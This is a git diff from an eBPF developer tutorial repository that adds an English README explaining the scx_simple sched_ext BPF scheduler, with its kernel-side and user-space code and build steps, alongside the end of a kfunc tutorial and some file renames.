eBPF program, you can execute it to observe the interaction between the eBPF program and the custom kfunc. - -**Sample Output:** - -```bash -# sudo ./load_kfunc -BPF program loaded and attached successfully. Press Ctrl-C to exit. -``` - -Then, when the `do_unlinkat` function is invoked (e.g., when a file is unlinked), you can check the kernel logs: - -```bash -dmesg | tail -``` - -**Expected Output:** - -```txt -[ 1234.5678] 'wor' found in 'Hello, world!' at index 7 -[ 1234.5679] Hello, world!
(pid: 2075) bpf_strstr 7 -``` - -**Explanation of the Output:** - -Each time the `do_unlinkat` function is invoked in the kernel, the eBPF program prints a message indicating the PID of the process and the result of the kfunc call. In this example, the substring `"wor"` is found at index `7` in the string `"Hello, world!"`. - -## Summary and Conclusion - -In this tutorial, we've delved deep into extending eBPF's capabilities by defining and utilizing custom kernel functions (kfuncs). Here's a recap of what we've covered: - -- **Understanding kfuncs:** Grasped the concept of kfuncs and their role in enhancing eBPF beyond standard helper functions. -- **Defining kfuncs:** Created a kernel module that defines a custom `strstr` kfunc, ensuring it can be safely exposed to eBPF programs without altering the core kernel. -- **Writing eBPF Programs with kfuncs:** Developed an eBPF program that leverages the custom kfunc to perform specific operations, demonstrating the enhanced functionality. -- **Compilation and Execution:** Provided a step-by-step guide to compile, load, and run both the kernel module and the eBPF program, ensuring you can replicate the setup on your own system. -- **Error Handling:** Addressed potential compilation issues and offered solutions to ensure a smooth development experience. - -**Key Takeaways:** - -- **Overcoming Helper Limitations:** kfuncs bridge the gaps left by standard eBPF helpers, offering extended functionality tailored to specific needs. -- **Maintaining System Stability:** By encapsulating kfuncs within kernel modules, you ensure that system stability is maintained without making invasive changes to the kernel. -- **Community-Driven Evolution:** The rapid growth and adoption of kfuncs highlight the eBPF community's commitment to pushing the boundaries of what's possible with kernel-level programming. -- **Leveraging Existing kfuncs:** Before defining new kfuncs, explore the existing ones provided by the kernel. They cover a wide range of functionalities, reducing the need to create custom functions unless absolutely necessary. - -**Ready to elevate your eBPF skills even further?** [Visit our tutorial repository](https://github.com/eunomia-bpf/bpf-developer-tutorial) and [explore more tutorials on our website](https://eunomia.dev/tutorials/). Dive into a wealth of examples, deepen your understanding, and contribute to the dynamic world of eBPF! - -Happy eBPF-ing! - -## References - -- [BPF Kernel Functions Documentation](https://docs.kernel.org/bpf/kfuncs.html) -- [eBPF kfuncs Guide](https://docs.ebpf.io/linux/kfuncs/) - -## Additional Resources - -If you'd like to learn more about eBPF knowledge and practices, you can visit our open-source tutorial code repository at [bpf-developer-tutorial](https://github.com/eunomia-bpf/bpf-developer-tutorial) or our website [eunomia.dev/tutorials](https://eunomia.dev/tutorials/) for more examples and complete code. diff --git a/src/43-kfuncs/module/README.md b/src/43-kfuncs/module/README.zh.md similarity index 100% rename from src/43-kfuncs/module/README.md rename to src/43-kfuncs/module/README.zh.md diff --git a/src/44-scx-simple/README.md b/src/44-scx-simple/README.md index e69de29..4147a9c 100644 --- a/src/44-scx-simple/README.md +++ b/src/44-scx-simple/README.md @@ -0,0 +1,425 @@ +# eBPF Tutorial: Introduction to the BPF Scheduler + +Welcome to our deep dive into the world of eBPF with a focus on the BPF scheduler! If you're looking to extend your eBPF knowledge beyond the basics, you're in the right place. 
In this tutorial, we'll explore the **scx_simple scheduler**, a minimal example of the sched_ext scheduler class introduced in Linux kernel version `6.12`. We'll walk you through its architecture, how it leverages BPF programs to define scheduling behavior, and guide you through compiling and running the example. By the end, you'll have a solid understanding of how to create and manage advanced scheduling policies using eBPF. + +## Understanding the Extensible BPF Scheduler + +At the heart of this tutorial is the **sched_ext** scheduler class. Unlike traditional schedulers, sched_ext allows its behavior to be defined dynamically through a set of BPF programs, making it highly flexible and customizable. This means you can implement any scheduling algorithm on top of sched_ext, tailored to your specific needs. + +### Key Features of sched_ext + +- **Flexible Scheduling Algorithms:** Implement any scheduling policy by writing BPF programs. +- **Dynamic CPU Grouping:** The BPF scheduler can group CPUs as needed, without tying tasks to specific CPUs upon wakeup. +- **Runtime Control:** Enable or disable the BPF scheduler on-the-fly without rebooting. +- **System Integrity:** Even if the BPF scheduler encounters errors, the system gracefully reverts to the default scheduling behavior. +- **Debugging Support:** Comprehensive debug information is available through the `sched_ext_dump` tracepoint and SysRq key sequences. + +With these features, sched_ext provides a robust foundation for experimenting with and deploying advanced scheduling strategies. + +## Introducing scx_simple: A Minimal sched_ext Scheduler + +The **scx_simple** scheduler is a straightforward example of a sched_ext scheduler that ships in the Linux kernel's `tools/sched_ext` directory. It's designed to be easy to understand and serves as a foundation for more complex scheduling policies. scx_simple can operate in two modes: + +1. **Global Weighted Virtual Time (vtime) Mode:** Prioritizes tasks based on their virtual time, allowing for fair scheduling across different workloads. +2. **FIFO (First-In-First-Out) Mode:** Simple queue-based scheduling where tasks are executed in the order they arrive. + +### Use Case and Suitability + +scx_simple is particularly effective on single-socket CPUs with a uniform L3 cache topology. While the global FIFO mode can handle many workloads efficiently, it's essential to note that saturating threads might overshadow less active ones. Therefore, scx_simple is best suited for environments where a straightforward scheduling policy meets the performance and fairness requirements. + +### Production Readiness + +While scx_simple is minimalistic, it can be deployed in production settings under the right conditions: + +- **Hardware Constraints:** Best suited for systems with single-socket CPUs and uniform cache architectures. +- **Workload Characteristics:** Ideal for workloads that don't require intricate scheduling policies and can benefit from simple FIFO or weighted vtime scheduling. + +## Diving into the Code: Kernel and User-Space Analysis + +Let's explore how scx_simple is implemented both in the kernel and user-space. We'll start by presenting the complete code snippets and then break down their functionalities. + +### Kernel-Side Implementation + +```c +#include <scx/common.bpf.h> + +char _license[] SEC("license") = "GPL"; + +const volatile bool fifo_sched; + +static u64 vtime_now; +UEI_DEFINE(uei); + +/* + * Built-in DSQs such as SCX_DSQ_GLOBAL cannot be used as priority queues + * (meaning, cannot be dispatched to with scx_bpf_dispatch_vtime()).
We + * therefore create a separate DSQ with ID 0 that we dispatch to and consume + * from. If scx_simple only supported global FIFO scheduling, then we could + * just use SCX_DSQ_GLOBAL. + */ +#define SHARED_DSQ 0 + +struct { + __uint(type, BPF_MAP_TYPE_PERCPU_ARRAY); + __uint(key_size, sizeof(u32)); + __uint(value_size, sizeof(u64)); + __uint(max_entries, 2); /* [local, global] */ +} stats SEC(".maps"); + +static void stat_inc(u32 idx) +{ + u64 *cnt_p = bpf_map_lookup_elem(&stats, &idx); + if (cnt_p) + (*cnt_p)++; +} + +static inline bool vtime_before(u64 a, u64 b) +{ + return (s64)(a - b) < 0; +} + +s32 BPF_STRUCT_OPS(simple_select_cpu, struct task_struct *p, s32 prev_cpu, u64 wake_flags) +{ + bool is_idle = false; + s32 cpu; + + cpu = scx_bpf_select_cpu_dfl(p, prev_cpu, wake_flags, &is_idle); + if (is_idle) { + stat_inc(0); /* count local queueing */ + scx_bpf_dispatch(p, SCX_DSQ_LOCAL, SCX_SLICE_DFL, 0); + } + + return cpu; +} + +void BPF_STRUCT_OPS(simple_enqueue, struct task_struct *p, u64 enq_flags) +{ + stat_inc(1); /* count global queueing */ + + if (fifo_sched) { + scx_bpf_dispatch(p, SHARED_DSQ, SCX_SLICE_DFL, enq_flags); + } else { + u64 vtime = p->scx.dsq_vtime; + + /* + * Limit the amount of budget that an idling task can accumulate + * to one slice. + */ + if (vtime_before(vtime, vtime_now - SCX_SLICE_DFL)) + vtime = vtime_now - SCX_SLICE_DFL; + + scx_bpf_dispatch_vtime(p, SHARED_DSQ, SCX_SLICE_DFL, vtime, + enq_flags); + } +} + +void BPF_STRUCT_OPS(simple_dispatch, s32 cpu, struct task_struct *prev) +{ + scx_bpf_consume(SHARED_DSQ); +} + +void BPF_STRUCT_OPS(simple_running, struct task_struct *p) +{ + if (fifo_sched) + return; + + /* + * Global vtime always progresses forward as tasks start executing. The + * test and update can be performed concurrently from multiple CPUs and + * thus racy. Any error should be contained and temporary. Let's just + * live with it. + */ + if (vtime_before(vtime_now, p->scx.dsq_vtime)) + vtime_now = p->scx.dsq_vtime; +} + +void BPF_STRUCT_OPS(simple_stopping, struct task_struct *p, bool runnable) +{ + if (fifo_sched) + return; + + /* + * Scale the execution time by the inverse of the weight and charge. + * + * Note that the default yield implementation yields by setting + * @p->scx.slice to zero and the following would treat the yielding task + * as if it has consumed all its slice. If this penalizes yielding tasks + * too much, determine the execution time by taking explicit timestamps + * instead of depending on @p->scx.slice. + */ + p->scx.dsq_vtime += (SCX_SLICE_DFL - p->scx.slice) * 100 / p->scx.weight; +} + +void BPF_STRUCT_OPS(simple_enable, struct task_struct *p) +{ + p->scx.dsq_vtime = vtime_now; +} + +s32 BPF_STRUCT_OPS_SLEEPABLE(simple_init) +{ + return scx_bpf_create_dsq(SHARED_DSQ, -1); +} + +void BPF_STRUCT_OPS(simple_exit, struct scx_exit_info *ei) +{ + UEI_RECORD(uei, ei); +} + +SCX_OPS_DEFINE(simple_ops, + .select_cpu = (void *)simple_select_cpu, + .enqueue = (void *)simple_enqueue, + .dispatch = (void *)simple_dispatch, + .running = (void *)simple_running, + .stopping = (void *)simple_stopping, + .enable = (void *)simple_enable, + .init = (void *)simple_init, + .exit = (void *)simple_exit, + .name = "simple"); +``` + +#### Kernel-Side Breakdown + +The kernel-side implementation of scx_simple defines how tasks are selected, enqueued, dispatched, and managed. Here's a high-level overview: + +1. **Initialization and Licensing:** + - The scheduler is licensed under GPL. 
+ - A global variable `fifo_sched` determines the scheduling mode (FIFO or weighted vtime). + +2. **Dispatch Queue (DSQ) Management:** + - A shared DSQ (`SHARED_DSQ`) with ID 0 is created to handle task dispatching. + - A `stats` map tracks the number of tasks queued locally and globally. + +3. **CPU Selection (`simple_select_cpu`):** + - Selects the CPU for a waking task. + - If the selected CPU is idle, the task is immediately dispatched to the local DSQ. + +4. **Task Enqueueing (`simple_enqueue`):** + - Depending on the `fifo_sched` flag, tasks are either dispatched to the shared DSQ in FIFO mode or to a priority queue based on virtual time. + - Virtual time (`vtime`) ensures fair scheduling by accounting for task execution time and weight. + +5. **Task Dispatching (`simple_dispatch`):** + - Consumes tasks from the shared DSQ and assigns them to CPUs. + +6. **Running and Stopping Tasks (`simple_running` & `simple_stopping`):** + - Manages the progression of virtual time for tasks, ensuring that scheduling decisions remain fair and balanced. + +7. **Enabling and Exiting:** + - Handles the enabling of the scheduler and records exit information for debugging. + +This modular structure allows scx_simple to be both simple and effective, providing a clear example of how to implement custom scheduling policies using eBPF. + +### User-Space Implementation + +```c +static void read_stats(struct scx_simple *skel, __u64 *stats) +{ + int nr_cpus = libbpf_num_possible_cpus(); + __u64 cnts[2][nr_cpus]; + __u32 idx; + + memset(stats, 0, sizeof(stats[0]) * 2); + + for (idx = 0; idx < 2; idx++) { + int ret, cpu; + + ret = bpf_map_lookup_elem(bpf_map__fd(skel->maps.stats), + &idx, cnts[idx]); + if (ret < 0) + continue; + for (cpu = 0; cpu < nr_cpus; cpu++) + stats[idx] += cnts[idx][cpu]; + } +} + +int main(int argc, char **argv) +{ + struct scx_simple *skel; + struct bpf_link *link; + __u32 opt; + __u64 ecode; + + libbpf_set_print(libbpf_print_fn); + signal(SIGINT, sigint_handler); + signal(SIGTERM, sigint_handler); +restart: + skel = SCX_OPS_OPEN(simple_ops, scx_simple); + + while ((opt = getopt(argc, argv, "fvh")) != -1) { + switch (opt) { + case 'f': + skel->rodata->fifo_sched = true; + break; + case 'v': + verbose = true; + break; + default: + fprintf(stderr, help_fmt, basename(argv[0])); + return opt != 'h'; + } + } + + SCX_OPS_LOAD(skel, simple_ops, scx_simple, uei); + link = SCX_OPS_ATTACH(skel, simple_ops, scx_simple); + + while (!exit_req && !UEI_EXITED(skel, uei)) { + __u64 stats[2]; + + read_stats(skel, stats); + printf("local=%llu global=%llu\n", stats[0], stats[1]); + fflush(stdout); + sleep(1); + } + + bpf_link__destroy(link); + ecode = UEI_REPORT(skel, uei); + scx_simple__destroy(skel); + + if (UEI_ECODE_RESTART(ecode)) + goto restart; + return 0; +} +``` + +#### User-Space Breakdown + +The user-space component is responsible for interacting with the BPF scheduler, managing its lifecycle, and monitoring its performance. Here's a snapshot of its responsibilities: + +1. **Statistics Collection (`read_stats`):** + - Reads the number of tasks queued locally and globally from the BPF maps. + - Aggregates statistics across all CPUs for reporting. + +2. **Main Function Workflow:** + - **Initialization:** Sets up libbpf, handles signal interrupts, and opens the scx_simple BPF skeleton. + - **Argument Parsing:** Processes command-line options to toggle FIFO scheduling and verbosity. + - **Loading and Attaching:** Loads the BPF program and attaches it to the scheduler. 
+ - **Monitoring Loop:** Continuously reads and prints scheduling statistics every second. + - **Cleanup:** Destroys BPF links and handles potential restarts based on exit codes. + +This user-space program provides a straightforward interface to monitor and control the scx_simple scheduler, making it easier to understand its behavior in real-time. + +## Deep Dive into Key Concepts + +To fully grasp how scx_simple operates, let's explore some of the underlying concepts and mechanisms: + +### Dispatch Queues (DSQs) + +DSQs are central to sched_ext's operation, acting as buffers where tasks are queued before being dispatched to CPUs. They can function as either FIFO queues or priority queues based on virtual time. + +- **Local DSQs (`SCX_DSQ_LOCAL`):** Each CPU has its own local DSQ, ensuring that tasks can be dispatched and consumed efficiently without contention. +- **Global DSQ (`SCX_DSQ_GLOBAL`):** A shared queue where tasks from all CPUs can be queued, providing a fallback when local queues are empty. +- **Custom DSQs:** Developers can create additional DSQs using `scx_bpf_create_dsq()` for more specialized scheduling needs. + +### Virtual Time (vtime) + +Virtual time is a mechanism to ensure fairness in scheduling by tracking how much time a task has consumed relative to its weight. In scx_simple's weighted vtime mode, tasks with higher weights consume virtual time more slowly, allowing lower-weighted tasks to run more frequently. + +### Scheduling Cycle + +Understanding the scheduling cycle is crucial for modifying or extending scx_simple: + +1. **Task Wakeup:** + - `ops.select_cpu()` is invoked to select an optimal CPU for the waking task. + - If the selected CPU is idle, the task is dispatched immediately to the local DSQ. + +2. **Task Enqueueing:** + - `ops.enqueue()` decides whether to dispatch the task to the global DSQ, a local DSQ, or a custom DSQ based on the scheduling mode. + +3. **Task Dispatching:** + - When a CPU is ready to schedule, it first checks its local DSQ, then the global DSQ, and finally invokes `ops.dispatch()` if needed. + +4. **Task Execution:** + - The CPU executes the selected task, updating its virtual time and ensuring fair scheduling. + +This cycle ensures that tasks are scheduled efficiently while maintaining fairness and responsiveness. + +## Compiling and Running scx_simple + +Getting scx_simple up and running involves setting up the necessary toolchain and configuring the kernel appropriately. Here's how you can compile and execute the example scheduler. + +### Toolchain Dependencies + +Before compiling scx_simple, ensure you have the following tools installed: + +1. **clang >= 16.0.0** + - Required for compiling BPF programs. While GCC is working on BPF support, it lacks essential features like BTF type tags necessary for certain functionalities. + +2. **pahole >= 1.25** + - Used to generate BTF from DWARF, which is crucial for type information in BPF programs. + +3. **rust >= 1.70.0** + - If you're working with Rust-based schedulers, ensure you have the appropriate Rust toolchain version. + +Additionally, tools like `make` are required for building the examples. 
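The next subsection lists the exact kernel options sched_ext depends on; it can save a failed build to verify them on the running kernel first. A sketch, assuming the config is exposed under `/boot` or at `/proc/config.gz` (locations vary by distribution):

```bash
# Check the running kernel for sched_ext and BTF support (paths vary by distro)
grep -E 'CONFIG_SCHED_CLASS_EXT|CONFIG_DEBUG_INFO_BTF' /boot/config-$(uname -r) \
  || zgrep -E 'CONFIG_SCHED_CLASS_EXT|CONFIG_DEBUG_INFO_BTF' /proc/config.gz
```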
+ +### Kernel Configuration + +To enable and use sched_ext, ensure the following kernel configuration options are set: + +```plaintext +CONFIG_BPF=y +CONFIG_SCHED_CLASS_EXT=y +CONFIG_BPF_SYSCALL=y +CONFIG_BPF_JIT=y +CONFIG_DEBUG_INFO_BTF=y +CONFIG_BPF_JIT_ALWAYS_ON=y +CONFIG_BPF_JIT_DEFAULT_ON=y +CONFIG_PAHOLE_HAS_SPLIT_BTF=y +CONFIG_PAHOLE_HAS_BTF_TAG=y +``` + +These configurations enable the necessary features for BPF scheduling and ensure that sched_ext operates correctly. + +### Building scx_simple + +Navigate to the kernel's `tools/sched_ext/` directory and run: + +```bash +make +``` + +This command compiles the scx_simple scheduler along with its dependencies. + +### Running scx_simple + +Once compiled, you can execute the user-space program to load and monitor the scheduler: + +```bash +./scx_simple -f +``` + +The `-f` flag enables FIFO scheduling mode. You can also use `-v` for verbose output or `-h` for help. + +As the program runs, it will display the number of tasks queued locally and globally every second: + +```plaintext +local=123 global=456 +local=124 global=457 +... +``` + +### Switching Between sched_ext and CFS + +sched_ext operates alongside the default Completely Fair Scheduler (CFS). You can switch between sched_ext and CFS dynamically: + +- **Enable sched_ext:** Load the BPF scheduler using scx_simple. +- **Disable sched_ext:** Terminate the scx_simple program, reverting all tasks back to CFS. + +Additionally, using SysRq key sequences like `SysRq-S` can help manage the scheduler's state and trigger debug dumps with `SysRq-D`. + +## Summary and Next Steps + +In this tutorial, we've introduced the **sched_ext** scheduler class and walked through a minimal example, **scx_simple**, demonstrating how to define custom scheduling behaviors using eBPF programs. We've covered the architecture, key concepts like DSQs and virtual time, and provided step-by-step instructions for compiling and running the scheduler. + +By mastering scx_simple, you're well-equipped to design and implement more sophisticated scheduling policies tailored to your specific requirements. Whether you're optimizing for performance, fairness, or specific workload characteristics, sched_ext and eBPF offer the flexibility and power to achieve your goals. + +> Ready to take your eBPF skills to the next level? Dive deeper into our tutorials and explore more examples by visiting our [tutorial repository](https://github.com/eunomia-bpf/bpf-developer-tutorial) or our [website](https://eunomia.dev/tutorials/). + +## References + +- **sched_ext Repository:** [https://github.com/sched-ext/scx](https://github.com/sched-ext/scx) +- **Linux Kernel Documentation:** [Scheduler Ext Documentation](https://www.kernel.org/doc/html/next/scheduler/sched-ext.html) +- **Kernel Source Tree:** [Linux Kernel sched_ext Tools](https://github.com/torvalds/linux/tree/master/tools/sched_ext) +- **eBPF Official Documentation:** [https://ebpf.io/docs/](https://ebpf.io/docs/) +- **libbpf Documentation:** [https://github.com/libbpf/libbpf](https://github.com/libbpf/libbpf) + +Feel free to explore these resources to expand your understanding and continue your journey into advanced eBPF programming! 
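One last practical tip, as a sketch based on the sched_ext kernel documentation (assuming a 6.12+ kernel built with `CONFIG_SCHED_CLASS_EXT`): while a BPF scheduler such as scx_simple is attached, sysfs reports which scheduler is in charge, which is an easy way to confirm that tasks are really running under sched_ext rather than CFS.

```bash
# Inspect sched_ext state while scx_simple is attached (paths per the sched_ext docs)
cat /sys/kernel/sched_ext/state      # expected: enabled
cat /sys/kernel/sched_ext/root/ops   # expected: simple
```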
diff --git a/src/44-scx-simple/README.zh.md b/src/44-scx-simple/README.zh.md new file mode 100644 index 0000000..e69de29 diff --git a/src/44-scx-simple/README_en.md b/src/44-scx-simple/README_en.md deleted file mode 100644 index 4147a9c..0000000 --- a/src/44-scx-simple/README_en.md +++ /dev/null @@ -1,425 +0,0 @@ -# eBPF Tutorial: Introduction to the BPF Scheduler - -Welcome to our deep dive into the world of eBPF with a focus on the BPF scheduler! If you're looking to extend your eBPF knowledge beyond the basics, you're in the right place. In this tutorial, we'll explore the **scx_simple scheduler**, a minimal example of the sched_ext scheduler class introduced in Linux kernel version `6.12`. We'll walk you through its architecture, how it leverages BPF programs to define scheduling behavior, and guide you through compiling and running the example. By the end, you'll have a solid understanding of how to create and manage advanced scheduling policies using eBPF. - -## Understanding the Extensible BPF Scheduler - -At the heart of this tutorial is the **sched_ext** scheduler class. Unlike traditional schedulers, sched_ext allows its behavior to be defined dynamically through a set of BPF programs, making it highly flexible and customizable. This means you can implement any scheduling algorithm on top of sched_ext, tailored to your specific needs. - -### Key Features of sched_ext - -- **Flexible Scheduling Algorithms:** Implement any scheduling policy by writing BPF programs. -- **Dynamic CPU Grouping:** The BPF scheduler can group CPUs as needed, without tying tasks to specific CPUs upon wakeup. -- **Runtime Control:** Enable or disable the BPF scheduler on-the-fly without rebooting. -- **System Integrity:** Even if the BPF scheduler encounters errors, the system gracefully reverts to the default scheduling behavior. -- **Debugging Support:** Comprehensive debug information is available through the `sched_ext_dump` tracepoint and SysRq key sequences. - -With these features, sched_ext provides a robust foundation for experimenting with and deploying advanced scheduling strategies. - -## Introducing scx_simple: A Minimal sched_ext Scheduler - -The **scx_simple** scheduler is a straightforward example of a sched_ext scheduler in the linux tools. It's designed to be easy to understand and serves as a foundation for more complex scheduling policies. scx_simple can operate in two modes: - -1. **Global Weighted Virtual Time (vtime) Mode:** Prioritizes tasks based on their virtual time, allowing for fair scheduling across different workloads. -2. **FIFO (First-In-First-Out) Mode:** Simple queue-based scheduling where tasks are executed in the order they arrive. - -### Use Case and Suitability - -scx_simple is particularly effective on single-socket CPUs with a uniform L3 cache topology. While the global FIFO mode can handle many workloads efficiently, it's essential to note that saturating threads might overshadow less active ones. Therefore, scx_simple is best suited for environments where a straightforward scheduling policy meets the performance and fairness requirements. - -### Production Readiness - -While scx_simple is minimalistic, it can be deployed in production settings under the right conditions: - -- **Hardware Constraints:** Best suited for systems with single-socket CPUs and uniform cache architectures. -- **Workload Characteristics:** Ideal for workloads that don't require intricate scheduling policies and can benefit from simple FIFO or weighted vtime scheduling. 
- -## Diving into the Code: Kernel and User-Space Analysis - -Let's explore how scx_simple is implemented both in the kernel and user-space. We'll start by presenting the complete code snippets and then break down their functionalities. - -### Kernel-Side Implementation - -```c -#include - -char _license[] SEC("license") = "GPL"; - -const volatile bool fifo_sched; - -static u64 vtime_now; -UEI_DEFINE(uei); - -/* - * Built-in DSQs such as SCX_DSQ_GLOBAL cannot be used as priority queues - * (meaning, cannot be dispatched to with scx_bpf_dispatch_vtime()). We - * therefore create a separate DSQ with ID 0 that we dispatch to and consume - * from. If scx_simple only supported global FIFO scheduling, then we could - * just use SCX_DSQ_GLOBAL. - */ -#define SHARED_DSQ 0 - -struct { - __uint(type, BPF_MAP_TYPE_PERCPU_ARRAY); - __uint(key_size, sizeof(u32)); - __uint(value_size, sizeof(u64)); - __uint(max_entries, 2); /* [local, global] */ -} stats SEC(".maps"); - -static void stat_inc(u32 idx) -{ - u64 *cnt_p = bpf_map_lookup_elem(&stats, &idx); - if (cnt_p) - (*cnt_p)++; -} - -static inline bool vtime_before(u64 a, u64 b) -{ - return (s64)(a - b) < 0; -} - -s32 BPF_STRUCT_OPS(simple_select_cpu, struct task_struct *p, s32 prev_cpu, u64 wake_flags) -{ - bool is_idle = false; - s32 cpu; - - cpu = scx_bpf_select_cpu_dfl(p, prev_cpu, wake_flags, &is_idle); - if (is_idle) { - stat_inc(0); /* count local queueing */ - scx_bpf_dispatch(p, SCX_DSQ_LOCAL, SCX_SLICE_DFL, 0); - } - - return cpu; -} - -void BPF_STRUCT_OPS(simple_enqueue, struct task_struct *p, u64 enq_flags) -{ - stat_inc(1); /* count global queueing */ - - if (fifo_sched) { - scx_bpf_dispatch(p, SHARED_DSQ, SCX_SLICE_DFL, enq_flags); - } else { - u64 vtime = p->scx.dsq_vtime; - - /* - * Limit the amount of budget that an idling task can accumulate - * to one slice. - */ - if (vtime_before(vtime, vtime_now - SCX_SLICE_DFL)) - vtime = vtime_now - SCX_SLICE_DFL; - - scx_bpf_dispatch_vtime(p, SHARED_DSQ, SCX_SLICE_DFL, vtime, - enq_flags); - } -} - -void BPF_STRUCT_OPS(simple_dispatch, s32 cpu, struct task_struct *prev) -{ - scx_bpf_consume(SHARED_DSQ); -} - -void BPF_STRUCT_OPS(simple_running, struct task_struct *p) -{ - if (fifo_sched) - return; - - /* - * Global vtime always progresses forward as tasks start executing. The - * test and update can be performed concurrently from multiple CPUs and - * thus racy. Any error should be contained and temporary. Let's just - * live with it. - */ - if (vtime_before(vtime_now, p->scx.dsq_vtime)) - vtime_now = p->scx.dsq_vtime; -} - -void BPF_STRUCT_OPS(simple_stopping, struct task_struct *p, bool runnable) -{ - if (fifo_sched) - return; - - /* - * Scale the execution time by the inverse of the weight and charge. - * - * Note that the default yield implementation yields by setting - * @p->scx.slice to zero and the following would treat the yielding task - * as if it has consumed all its slice. If this penalizes yielding tasks - * too much, determine the execution time by taking explicit timestamps - * instead of depending on @p->scx.slice. 
- */ - p->scx.dsq_vtime += (SCX_SLICE_DFL - p->scx.slice) * 100 / p->scx.weight; -} - -void BPF_STRUCT_OPS(simple_enable, struct task_struct *p) -{ - p->scx.dsq_vtime = vtime_now; -} - -s32 BPF_STRUCT_OPS_SLEEPABLE(simple_init) -{ - return scx_bpf_create_dsq(SHARED_DSQ, -1); -} - -void BPF_STRUCT_OPS(simple_exit, struct scx_exit_info *ei) -{ - UEI_RECORD(uei, ei); -} - -SCX_OPS_DEFINE(simple_ops, - .select_cpu = (void *)simple_select_cpu, - .enqueue = (void *)simple_enqueue, - .dispatch = (void *)simple_dispatch, - .running = (void *)simple_running, - .stopping = (void *)simple_stopping, - .enable = (void *)simple_enable, - .init = (void *)simple_init, - .exit = (void *)simple_exit, - .name = "simple"); -``` - -#### Kernel-Side Breakdown - -The kernel-side implementation of scx_simple defines how tasks are selected, enqueued, dispatched, and managed. Here's a high-level overview: - -1. **Initialization and Licensing:** - - The scheduler is licensed under GPL. - - A global variable `fifo_sched` determines the scheduling mode (FIFO or weighted vtime). - -2. **Dispatch Queue (DSQ) Management:** - - A shared DSQ (`SHARED_DSQ`) with ID 0 is created to handle task dispatching. - - A `stats` map tracks the number of tasks queued locally and globally. - -3. **CPU Selection (`simple_select_cpu`):** - - Selects the CPU for a waking task. - - If the selected CPU is idle, the task is immediately dispatched to the local DSQ. - -4. **Task Enqueueing (`simple_enqueue`):** - - Depending on the `fifo_sched` flag, tasks are either dispatched to the shared DSQ in FIFO mode or to a priority queue based on virtual time. - - Virtual time (`vtime`) ensures fair scheduling by accounting for task execution time and weight. - -5. **Task Dispatching (`simple_dispatch`):** - - Consumes tasks from the shared DSQ and assigns them to CPUs. - -6. **Running and Stopping Tasks (`simple_running` & `simple_stopping`):** - - Manages the progression of virtual time for tasks, ensuring that scheduling decisions remain fair and balanced. - -7. **Enabling and Exiting:** - - Handles the enabling of the scheduler and records exit information for debugging. - -This modular structure allows scx_simple to be both simple and effective, providing a clear example of how to implement custom scheduling policies using eBPF. 
- -### User-Space Implementation - -```c -static void read_stats(struct scx_simple *skel, __u64 *stats) -{ - int nr_cpus = libbpf_num_possible_cpus(); - __u64 cnts[2][nr_cpus]; - __u32 idx; - - memset(stats, 0, sizeof(stats[0]) * 2); - - for (idx = 0; idx < 2; idx++) { - int ret, cpu; - - ret = bpf_map_lookup_elem(bpf_map__fd(skel->maps.stats), - &idx, cnts[idx]); - if (ret < 0) - continue; - for (cpu = 0; cpu < nr_cpus; cpu++) - stats[idx] += cnts[idx][cpu]; - } -} - -int main(int argc, char **argv) -{ - struct scx_simple *skel; - struct bpf_link *link; - __u32 opt; - __u64 ecode; - - libbpf_set_print(libbpf_print_fn); - signal(SIGINT, sigint_handler); - signal(SIGTERM, sigint_handler); -restart: - skel = SCX_OPS_OPEN(simple_ops, scx_simple); - - while ((opt = getopt(argc, argv, "fvh")) != -1) { - switch (opt) { - case 'f': - skel->rodata->fifo_sched = true; - break; - case 'v': - verbose = true; - break; - default: - fprintf(stderr, help_fmt, basename(argv[0])); - return opt != 'h'; - } - } - - SCX_OPS_LOAD(skel, simple_ops, scx_simple, uei); - link = SCX_OPS_ATTACH(skel, simple_ops, scx_simple); - - while (!exit_req && !UEI_EXITED(skel, uei)) { - __u64 stats[2]; - - read_stats(skel, stats); - printf("local=%llu global=%llu\n", stats[0], stats[1]); - fflush(stdout); - sleep(1); - } - - bpf_link__destroy(link); - ecode = UEI_REPORT(skel, uei); - scx_simple__destroy(skel); - - if (UEI_ECODE_RESTART(ecode)) - goto restart; - return 0; -} -``` - -#### User-Space Breakdown - -The user-space component is responsible for interacting with the BPF scheduler, managing its lifecycle, and monitoring its performance. Here's a snapshot of its responsibilities: - -1. **Statistics Collection (`read_stats`):** - - Reads the number of tasks queued locally and globally from the BPF maps. - - Aggregates statistics across all CPUs for reporting. - -2. **Main Function Workflow:** - - **Initialization:** Sets up libbpf, handles signal interrupts, and opens the scx_simple BPF skeleton. - - **Argument Parsing:** Processes command-line options to toggle FIFO scheduling and verbosity. - - **Loading and Attaching:** Loads the BPF program and attaches it to the scheduler. - - **Monitoring Loop:** Continuously reads and prints scheduling statistics every second. - - **Cleanup:** Destroys BPF links and handles potential restarts based on exit codes. - -This user-space program provides a straightforward interface to monitor and control the scx_simple scheduler, making it easier to understand its behavior in real-time. - -## Deep Dive into Key Concepts - -To fully grasp how scx_simple operates, let's explore some of the underlying concepts and mechanisms: - -### Dispatch Queues (DSQs) - -DSQs are central to sched_ext's operation, acting as buffers where tasks are queued before being dispatched to CPUs. They can function as either FIFO queues or priority queues based on virtual time. - -- **Local DSQs (`SCX_DSQ_LOCAL`):** Each CPU has its own local DSQ, ensuring that tasks can be dispatched and consumed efficiently without contention. -- **Global DSQ (`SCX_DSQ_GLOBAL`):** A shared queue where tasks from all CPUs can be queued, providing a fallback when local queues are empty. -- **Custom DSQs:** Developers can create additional DSQs using `scx_bpf_create_dsq()` for more specialized scheduling needs. - -### Virtual Time (vtime) - -Virtual time is a mechanism to ensure fairness in scheduling by tracking how much time a task has consumed relative to its weight. 
